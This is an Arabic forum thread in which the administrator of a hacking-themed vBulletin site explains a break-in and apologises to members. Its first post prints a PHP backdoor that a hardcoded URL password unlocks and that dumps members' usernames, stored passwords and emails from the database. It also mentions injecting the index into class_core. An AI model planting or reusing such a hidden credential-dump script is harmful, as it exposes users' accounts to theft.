1. Dr.MOT

    Dr.MOT Support - Iq-Team

    الأنتساب:
    ‏2 سبتمبر 2011
    المشاركات:
    650
    الإعجابات المتلقاة:
    5,463
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    IraQ
    السلام عليكم ورحمة الله وبركاته

    اخواني اصدقائي اعضاء وزوار ورواد الموقع الكرام اسعد الله صباحكم بكل الخيرات

    سوف نقوم بمناقشة موضوع البعض يتصوره معجزه لاكن مانحن الا بشر قد نخطئ في بعض الاوقات

    تم عمل فلم هوليود للبطل الذي سوف يتوج ملك الهكر قريبآ بعد العيد i:q^:

    هل هناك اختراق ؟ يمشي الحال دعونا نتعمق في الموضوع فجميع رواد الموقع مهتم

    بأمور التقنيه ان لم يكن مهتم بالأختراق = لديه عقل ماتمشي عليه حركات الاطفال

    الأختراق فقط VB ؟ لماذا ؟ لم يكن كافة النطاق iq-team.org

    وكمان يوجد صب دومنين news.iq-team.org

    زادة الاثاره عند عرض الباسوردات والكثير قال كم انت كبير وحقيقة الامر العكس وسيتم التوضيح والتحليل


    التحليل

    عرض القاعدة بمساعدة class_get والسكربت وظيفته لعرض اسم العضو باسورد العضويه الايميل

    محتوى السكربت

    كود PHP:
    <?php

    $pass
    =$_GET['pass'];
    if (
    $pass=="951753"){
    $con = @mysql_connect("localhost","user","pass");
    $dbname="vb";

    mysql_query("set character_set_server='utf8'");
    mysql_query("set names 'utf8'");

    mysql_select_db($dbname);

    $result mysql_query("SELECT * FROM userpass");

    echo 
    "<table border='1'>
    <tr>
    <th>UserName</th>
    <th>PassWord</th>
    <th>E</th>
    </tr>"
    ;

    while(
    $row mysql_fetch_array($result))
      {
      
     
    // echo "<td>" . $row['Name'] . "</td>";
     // echo "<td>" . $row['PassWord'] . "</td>";
      
    $result1 mysql_query("SELECT email FROM user where username ='{$row['Name']}'");
         
    $row1 mysql_fetch_array($result1);
        
    // if($row1['email']!=''){
            
    echo "<tr>";
               echo 
    "<td>" urldecode($row['Name']) . "</td>";
               echo 
    "<td>" urldecode($row['PassWord']) . "</td>";
               echo 
    "<td>" $row1['email'] . "</td>"
                          
              
    //}
      
      
    echo "</tr>";
      }
    echo 
    "</table>";

    mysql_close($con);

    }

    ?> 
    ممتاز السكربت واضح يحتوي على قاعده وباس واسم المستخدم

    ويستطيع من خلاله عرض اخر الاعضاء خلال 48 ساعه

    اولا السكربت كان في الموقع منذ 2013 خطآ كبير مني شخصيآ ان اترك هكذا امر دون الحذف

    لم يتخطى اي شيئ كل شي جاهز قواعد موجود حقن الاندكس في ملف class_core ليعرض الاندكس في جميع صفحات المنتدى

    احلفك بالله الموقع مفتوح لخدمة الجميع وانت رائيت خطآ بدل التبليغ عن الخطآ تقوم بفرد العضلات هذا لايعتبر اختراق صديقي

    نحن نعتذر عن جميع بسبب ماحدث نسأل الله سبحانه وتعالى ان يوفقنا لخدمت الجميع

    سبب التأخر في اغلاق الموقع لعدم التفرغ وانشغالي في العمل
     
  2. Windows Hacker

    Windows Hacker V • I • P

    الأنتساب:
    ‏26 يوليو 2014
    المشاركات:
    636
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    الإقامة:
    |[ Occupied Bahrain ]|
    رد: كيف تم اختراق المنتدى ؟

    يريد يفرد عضلآته و يوم حس آنه خطأ قآم يكذب


    بآلتوفيق للجميع و عرآق تيم بآقي و يتمدد
     
  3. Dr.MOT

    Dr.MOT Support - Iq-Team

    الأنتساب:
    ‏2 سبتمبر 2011
    المشاركات:
    650
    الإعجابات المتلقاة:
    5,463
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    IraQ
    رد: كيف تم اختراق المنتدى ؟

    اهلآ بك صديقي العزيز

    نسى امر السكربت لوكنت غيرت ترميز القاعده لانه utf8 والمنتدى windows-1256

    حتى لايضهر لك مشاكل بالغه العربيه ممم
     
  4. E L I M O

    E L I M O .: مشرف اقسام ألانضمة :. مشرف

    الأنتساب:
    ‏4 سبتمبر 2014
    المشاركات:
    614
    الإعجابات المتلقاة:
    917
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    Etudiant
    رد: كيف تم اختراق المنتدى ؟

    وعليكم السلام ورحمة الله

    شكرا لك اخ محمد وجعل الله عملك في ميزان حسناتك

    للاسف تم اختراق بعض العضويات خاصتي من بعض الاطفال ضعفاء النفوس
    لاكن مانقول الا حسبنا الله ونعم الوكيل
    للاسف اقولها بكل مرارة العالم يطور ونحن نخرب
     
  5. L3gsP3te

    L3gsP3te New Developer

    الأنتساب:
    ‏28 أغسطس 2015
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: كيف تم اختراق المنتدى ؟

    لا حول ولاقوة الا بالله اعوذ بالله من اطفال التقليد
    هو يحسب انه اخترق مع انه تعلم كل شيئ من الموقع
    لا اله الا الله محمد رسول الله والله لو اردنا لنلن منه
    قد بحثت عنهم وعرفتهم باسمائهم الحقيقية و التسميات في الانترنت
    لاكن سياتي يوم ...
    هم 4 أشخاص منهم او كلهم من العراق ...
     
  6. الحسن هادي

    الحسن هادي DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    300
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الوظيفة:
    طالب ثانوي
    الإقامة:
    .:: العراق ::.
    رد: كيف تم اختراق المنتدى ؟

    النجاح ليس عدم فعل الاخطاء [​IMG] ، النجاح هو عدم تكرار الاخطاء {1!$6}، جورج برنارد شو ، ~ فليكن اسفكم عن اختراق المنتدى ، رغبة في الرقي به ، و تحصينه ، و حفطه ، {1!$8}
    اتمنى الا نتعرض لهذه التجربة من جديد :{3!}:،
    دمتم في حفظ الله {1!$7}
     
  7. ặł ɱŏśĥặkěś

    ặł ɱŏśĥặkěś New Developer

    الأنتساب:
    ‏4 أكتوبر 2015
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: كيف تم اختراق المنتدى ؟

    عراق تيم
    باقي ويتمدد
     
  8. South Hack

    South Hack أبو حسين DeveloPer Plus

    الأنتساب:
    ‏15 نوفمبر 2014
    المشاركات:
    356
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    الإقامة:
    الــعراق
    رد: كيف تم اختراق المنتدى ؟

    النجاح هو الانتقال من فشل إلى فشل

    انشالله نرتقي ب هذا المنتدى الى الافضل ~​
     
  9. عہۗنہۗكہۗبہۗوت مہۗيہۗسأن

    عہۗنہۗكہۗبہۗوت مہۗيہۗسأن ŤĤĔ ŚĤÁĎŐŴ Developer

    الأنتساب:
    ‏18 نوفمبر 2015
    المشاركات:
    75
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    الجنس:
    ذكر
    رد: كيف تم اختراق المنتدى ؟

    نشاء الله عزيزي {1!$7}
     
  10. virus karbala

    virus karbala New Developer

    الأنتساب:
    ‏20 نوفمبر 2015
    المشاركات:
    4
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: كيف تم اختراق المنتدى ؟

    [​IMG]انشاء الله ماتتكرر [​IMG]
     

مشاركة هذه الصفحة